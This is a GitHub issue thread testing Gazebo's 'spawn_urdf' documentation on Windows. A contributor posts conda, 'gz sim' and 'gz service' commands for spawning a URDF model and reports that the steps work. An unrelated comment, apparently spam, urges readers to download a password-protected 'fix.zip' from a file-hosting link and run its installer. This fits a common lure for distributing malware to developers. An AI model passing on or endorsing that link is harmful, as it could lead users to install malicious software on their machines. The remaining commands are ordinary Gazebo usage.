gazebosim/gazebo_test_cases #1069: docs: spawn_urdf

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/docs/ionic/spawn_urdf)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/spawn_urdf.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Combuster54, 2024-09-12:
## Windows 11

I think we need to add steps for Windows
## Steps

Start conda enviroment: search `condabin` folder, then activate your enviroment

```sh
conda activate gz-ws
```
**launch server**
```sh
gz sim default.sdf -s 
```

Activate conda env in another terminal and launch `GUI`

**launch GUI**
```sh
gz sim -g
```

```sh
gz service -s /world/empty/create --reqtype gz.msgs.EntityFactory --reptype gz.msgs.Boolean --timeout 1000 --req 'sdf_filename: "/path/to/model.urdf", name: "urdf_model"'
```

[image]

The following command spawns the URDF file model.urdf into the Gazebo Sim world as a model named urdf_model:

[image]

[image]

Combuster54, 2024-09-12:
Works as expected.

closed 2024-09-13 by azeey